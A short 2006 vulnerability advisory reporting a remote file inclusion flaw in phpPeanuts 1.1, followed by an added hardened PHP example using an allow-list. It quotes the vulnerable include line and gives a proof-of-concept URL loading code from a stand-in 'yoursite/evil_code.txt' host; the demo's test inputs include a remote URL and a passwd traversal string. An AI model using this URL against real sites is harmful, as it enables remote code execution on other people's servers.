phppeanuts-rfi.txt
Posted on 16 November 2006
.:: Preface ::.

Type     : Remote File Include
Scripts  : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Found by : Hidayat Sagita aka bomm_3x
Contact  : hidayat.sagita[at]gmail[dot]com

.:: What ? ::.

In the Inspect.php file, on lines:

4. if ( isSet($_REQUEST["Include"]) )
5.     include $_REQUEST["Include"];

The "Include" request variable is not validated before it is passed to include.

.:: Proof Of Concept ::.

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?

.:: Shoutz ::.

eCHo staff, az001 and All newbz.
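.:: Hardened form (added example) ::.

The include on lines 4-5 of Inspect.php, rewritten so the request value only selects an entry from a fixed allow-list. This is an added example, not code from the advisory or from phpPeanuts; the function name resolve_include, the demo directory and the file names TestCaseA.php / TestCaseB.php are assumptions made for illustration.

```php
<?php
// Added example, not phpPeanuts code. ASSUMPTION: the directory and the
// allow-listed file names are hypothetical; the real layout is not on the page.

// Map the request-supplied name to a local file, or return null. The value only
// selects an allow-list entry; it is never used as a path or URL by itself.
function resolve_include($requested, $baseDir, array $allowed)
{
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null; // URLs, traversal strings, arrays and unknown names stop here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }
    // Defence in depth: the resolved path must stay inside the base directory
    // (catches a symlink planted under an allow-listed name).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo directory holding one allow-listed file.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pnt_includes_demo';
if (!is_dir($baseDir)) {
    mkdir($baseDir, 0700, true);
}
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'TestCaseA.php', "<?php // demo\n");
$allowed = array('TestCaseA.php', 'TestCaseB.php');

// Constructed sample values for the "Include" parameter.
$samples = array(
    'TestCaseA.php',                    // allow-listed and present: accepted
    'TestCaseB.php',                    // allow-listed but missing on disk
    'http://example.invalid/code.txt',  // remote URL
    '../../etc/passwd',                 // path traversal
    array('TestCaseA.php'),             // Include[]=... arrives as an array
);
foreach ($samples as $value) {
    $path = resolve_include($value, $baseDir, $allowed);
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    printf("%-36s => %s\n", $shown, $path === null ? 'rejected' : 'include ' . $path);
}
```

In Inspect.php the include statement would run only when resolve_include() returns a non-null path. Setting allow_url_include = Off in php.ini (the default since PHP 5.2) blocks remote URLs in include but not local file inclusion, so the allow-list is still needed.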